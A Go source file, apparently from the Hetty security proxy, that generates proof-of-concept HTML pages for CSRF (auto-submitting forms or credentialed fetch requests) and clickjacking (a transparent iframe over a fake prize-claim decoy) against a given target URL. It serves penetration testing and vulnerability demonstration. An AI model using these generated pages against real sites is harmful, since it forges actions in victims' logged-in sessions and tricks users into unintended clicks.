// Package poc generates proof-of-concept HTML pages for client-side
// vulnerabilities: CSRF (auto-submitting form or fetch) and clickjacking
// (transparent iframe overlay), mirroring Burp's CSRF PoC generator and
// Clickbandit engagement tools.
package poc

import (
	"fmt"
	"html"
	"net/url"
	"sort"
	"strings"
)

// Header is a single request header name/value pair.
type Header struct {
	Name  string `json:"name"`
	Value string `json:"value"`
}

// CSRFOptions configures CSRF PoC generation.
type CSRFOptions struct {
	Method      string   `json:"method"`
	URL         string   `json:"url"`
	Headers     []Header `json:"headers"`
	Body        string   `json:"body"`
	ContentType string   `json:"contentType"`
	// AutoSubmit emits a script that submits/sends the request on page load.
	AutoSubmit bool `json:"autoSubmit"`
}

// CSRF builds a self-contained HTML proof of concept that issues a
// cross-site request to the target. When the request is a simple
// form-encoded POST or a GET it emits an HTML <form> (which works without
// JavaScript and across the widest range of targets). For any other content
// type (JSON, XML, etc.) it emits a fetch()-based PoC with credentials.
func CSRF(opts CSRFOptions) (string, error) {
	method := strings.ToUpper(strings.TrimSpace(opts.Method))
	if method == "" {
		method = "GET"
	}

	u, err := url.Parse(strings.TrimSpace(opts.URL))
	if err != nil {
		return "", fmt.Errorf("poc: invalid url: %w", err)
	}
	if u.Scheme == "" || u.Host == "" {
		return "", fmt.Errorf("poc: url must be absolute (scheme + host)")
	}

	ct := opts.ContentType
	if ct == "" {
		ct = headerValue(opts.Headers, "Content-Type")
	}
	ct = strings.ToLower(ct)

	formCompatible := method == "GET" ||
		strings.HasPrefix(ct, "application/x-www-form-urlencoded") ||
		(ct == "" && method == "POST")

	if formCompatible {
		return csrfForm(method, u, opts.Body, opts.AutoSubmit), nil
	}
	return csrfFetch(method, u, opts), nil
}

func csrfForm(method string, u *url.URL, body string, autoSubmit bool) string {
	// Action URL without the query string; GET params become hidden fields.
	action := *u
	values := url.Values{}

	if method == "GET" {
		values = u.Query()
		action.RawQuery = ""
	} else if body != "" {
		if parsed, err := url.ParseQuery(body); err == nil {
			values = parsed
		}
	}

	var fields strings.Builder
	for _, name := range sortedKeys(values) {
		for _, v := range values[name] {
			fmt.Fprintf(&fields, "      <input type=\"hidden\" name=%q value=%q>\n",
				html.EscapeString(name), html.EscapeString(v))
		}
	}

	submit := ""
	if autoSubmit {
		submit = "    <script>document.forms[0].submit();</script>\n"
	}

	return fmt.Sprintf(`<!DOCTYPE html>
<html>
  <!-- CSRF proof of concept generated by Hetty -->
  <body>
    <form action=%q method=%q>
%s      <input type="submit" value="Submit CSRF">
    </form>
%s  </body>
</html>
`, html.EscapeString(action.String()), strings.ToUpper(method), fields.String(), submit)
}

func csrfFetch(method string, u *url.URL, opts CSRFOptions) string {
	var hdrs strings.Builder
	for _, h := range opts.Headers {
		if isForbiddenFetchHeader(h.Name) {
			continue
		}
		fmt.Fprintf(&hdrs, "        %s: %s,\n", jsString(h.Name), jsString(h.Value))
	}
	if opts.ContentType != "" && headerValue(opts.Headers, "Content-Type") == "" {
		fmt.Fprintf(&hdrs, "        %s: %s,\n", jsString("Content-Type"), jsString(opts.ContentType))
	}

	bodyLine := ""
	if method != "GET" && method != "HEAD" && opts.Body != "" {
		bodyLine = fmt.Sprintf("      body: %s,\n", jsString(opts.Body))
	}

	trigger := ""
	if opts.AutoSubmit {
		trigger = "    send();\n"
	}

	return fmt.Sprintf(`<!DOCTYPE html>
<html>
  <!-- CSRF (fetch) proof of concept generated by Hetty -->
  <body>
    <button onclick="send()">Submit CSRF</button>
    <script>
    function send() {
      fetch(%s, {
        method: %s,
        mode: "no-cors",
        credentials: "include",
        headers: {
%s        },
%s      });
    }
%s    </script>
  </body>
</html>
`, jsString(u.String()), jsString(strings.ToUpper(method)), hdrs.String(), bodyLine, trigger)
}

// Clickjacking builds a clickjacking PoC: the target is loaded in a
// semi-transparent iframe on top of a decoy, demonstrating UI redress when the
// target lacks X-Frame-Options / frame-ancestors protection.
func Clickjacking(targetURL string) (string, error) {
	u := strings.TrimSpace(targetURL)
	if u == "" {
		return "", fmt.Errorf("poc: target url is required")
	}
	if !strings.Contains(u, "://") {
		return "", fmt.Errorf("poc: target url must be absolute")
	}

	return fmt.Sprintf(`<!DOCTYPE html>
<html>
  <!-- Clickjacking proof of concept generated by Hetty -->
  <head>
    <style>
      body { font-family: sans-serif; }
      #decoy { position: absolute; top: 320px; left: 60px; z-index: 1; }
      #target {
        position: absolute; top: 0; left: 0;
        width: 1000px; height: 800px;
        opacity: 0.35; z-index: 2;
        filter: alpha(opacity=35);
      }
    </style>
  </head>
  <body>
    <div id="decoy">
      <h2>You have won! Click the button to claim your prize.</h2>
      <button>Claim prize</button>
    </div>
    <iframe id="target" src=%q sandbox="allow-forms allow-scripts allow-same-origin"></iframe>
  </body>
</html>
`, html.EscapeString(u)), nil
}

// --- helpers ---------------------------------------------------------------

func headerValue(headers []Header, name string) string {
	for _, h := range headers {
		if strings.EqualFold(h.Name, name) {
			return h.Value
		}
	}
	return ""
}

func sortedKeys(v url.Values) []string {
	keys := make([]string, 0, len(v))
	for k := range v {
		keys = append(keys, k)
	}
	sort.Strings(keys)
	return keys
}

// isForbiddenFetchHeader reports headers the browser will not let JS set on a
// fetch (so we omit them from the PoC rather than emit dead code).
func isForbiddenFetchHeader(name string) bool {
	switch strings.ToLower(name) {
	case "host", "content-length", "connection", "cookie", "origin", "referer",
		"user-agent", "accept-encoding", "accept-charset", "date":
		return true
	}
	return false
}

// jsString renders a Go string as a safe JS double-quoted string literal.
func jsString(s string) string {
	var b strings.Builder
	b.WriteByte('"')
	for _, r := range s {
		switch r {
		case '"':
			b.WriteString("\\\"")
		case '\\':
			b.WriteString("\\\\")
		case '\n':
			b.WriteString("\\n")
		case '\r':
			b.WriteString("\\r")
		case '<':
			b.WriteString("\\u003c")
		case '>':
			b.WriteString("\\u003e")
		case '&':
			b.WriteString("\\u0026")
		default:
			b.WriteRune(r)
		}
	}
	b.WriteByte('"')
	return b.String()
}
